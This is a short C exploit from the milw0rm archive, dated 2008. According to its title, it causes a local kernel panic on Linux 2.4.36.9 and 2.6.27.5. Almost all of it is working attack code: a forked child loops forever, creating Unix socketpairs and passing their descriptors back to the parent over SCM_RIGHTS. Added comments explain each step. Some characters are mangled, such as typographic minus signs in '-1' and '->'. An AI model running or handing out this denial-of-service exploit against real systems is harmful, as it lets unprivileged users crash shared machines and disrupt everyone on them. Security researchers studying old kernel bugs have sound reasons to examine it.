
Linux Kernel 2.4.36.92.6.27.5 Unix Sockets Local Kernel Panic Exploit

   1   #include     <sys/socket.h>
   2   #include     <sys/un.h>
   3   #include     <unistd.h>
   4   #include     <assert.h>
   5   #include     <err.h>
   6   #include     <stdlib.h>
   7
/*
 * Fork a helper child that keeps handing freshly created PF_UNIX socket
 * descriptors back to the parent via SCM_RIGHTS control messages.
 *
 * us: PF_UNIX socketpair created by the caller.  The parent side keeps
 *     us[0]; the child keeps us[1] and replaces it on every iteration.
 *
 * Returns the child's pid to the parent.  In the child this function never
 * returns normally: the while (1) loop below has no exit, so the child runs
 * until it is killed or one of the err()/errx() calls terminates it.  From a
 * monitoring standpoint the visible footprint is a fork followed by a tight
 * socketpair()/sendmsg() loop passing SCM_RIGHTS.
 */
static int own_child(int *us)
{
        int pid;
        int s[2];
        struct msghdr mh;
        char crap[1024];            /* ancillary-data buffer holding the SCM_RIGHTS header */
        struct iovec iov;
        struct cmsghdr *c;
        int *fd;                    /* points into crap at the descriptor slot of the cmsg */
        int rc;

        pid = fork();
        if (pid == −1)
                err(1, "fork()");

        if (pid) {
                /* Parent: drop the child's end and report the pid. */
                close(us[1]);

                return pid;
        }

        /* Child from here on: drop the parent's end. */
        close(us[0]);

        /* One byte of payload; the descriptor travels in the ancillary data. */
        memset(&mh, 0, sizeof(mh));
        iov.iov_base = "a";
        iov.iov_len = 1;

        mh.msg_iov           =   &iov;
        mh.msg_iovlen        =   1;
        mh.msg_control       =   crap;
        mh.msg_controllen    =   sizeof(crap);

        c = CMSG_FIRSTHDR(&mh);
        assert(c);

        c−>cmsg_level = SOL_SOCKET;
        c−>cmsg_type = SCM_RIGHTS;

        fd = (int*) CMSG_DATA(c);
        assert(fd);

        /* Exactly one int (one descriptor) per message; shrink controllen to fit. */
        c−>cmsg_len = CMSG_LEN(sizeof(int));
        mh.msg_controllen = c−>cmsg_len;

        while (1) {
                /* New socketpair each round: s[0] is sent, s[1] becomes the
                 * next sending socket, so every message after the first goes
                 * over the pair created in the previous iteration. */
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, s) == −1)
                        err(1, "socketpair()");

                *fd = s[0];

                rc = sendmsg(us[1], &mh, 0);
                if (rc == −1)
                        err(1, "sendmsg()");

                /* rc is int, iov_len is size_t; −1 was handled just above,
                 * so only a non-negative byte count reaches this comparison. */
                if (rc != iov.iov_len)
                        errx(1, "sent short");

                close(s[0]);
                close(us[1]);
                us[1] = s[1];
        }
}
  70
/*
 * Driver for the descriptor-passing sequence: on first call set up a PF_UNIX
 * socketpair and fork own_child() on it, then receive a single message from
 * the child and adopt the descriptor it carries.
 *
 * pid and us are static so a repeat call would reuse the existing child;
 * main() below calls this exactly once.  The page title attributes a kernel
 * panic on the listed kernel range to this sequence; the listing itself does
 * not show where that fault occurs, so nothing about it is asserted here.
 */
static void own(void)
{
        static int pid;
        static int us[2];
        char crap[1024];            /* ancillary-data buffer for recvmsg */
        char morte[1024];           /* payload buffer; the child sends one byte per message */
        struct cmsghdr *c;
        int rc;
        struct msghdr mh;
        struct iovec iov;
        int *fds;                   /* received descriptor(s) inside crap */

        if (!pid) {
                if (socketpair(PF_UNIX, SOCK_STREAM, 0, us) == −1)
                        err(1, "socketpair()");
                pid = own_child(us);
        }

        iov.iov_base = morte;
        iov.iov_len = sizeof(morte);

        memset(&mh, 0, sizeof(mh));
        mh.msg_iov        = &iov;
        mh.msg_iovlen     = 1;
        mh.msg_control    = crap;
        mh.msg_controllen = sizeof(crap);

        rc = recvmsg(us[0], &mh, 0);
        if (rc == −1)
                err(1, "recvmsg()");

        if (rc == 0)
                errx(1, "EOF");

        /* Only the first control message is examined; cmsg_level and
         * MSG_CTRUNC are not checked, the asserts cover presence and type only. */
        c = CMSG_FIRSTHDR(&mh);
        assert(c);
        assert(c−>cmsg_type == SCM_RIGHTS);

        fds = (int*) CMSG_DATA(c);
        assert(fds);

        /* Replace this side's end of the pair with the descriptor the child
         * just sent; the child keeps running its loop (see own_child). */
        close(us[0]);
        us[0] = *fds;
}
  115
/*
 * Entry point: run the sequence once and exit.  exit(0) ends the parent while
 * the child forked in own_child() is still in its loop; the child is neither
 * waited for nor killed here.
 */
int main(int argc, char *argv[])
{
        own();
        exit(0);
}
  121
  122   // milw0rm.com [2008−11−11]




Andrea Bittau                                                                             11/11/2008

				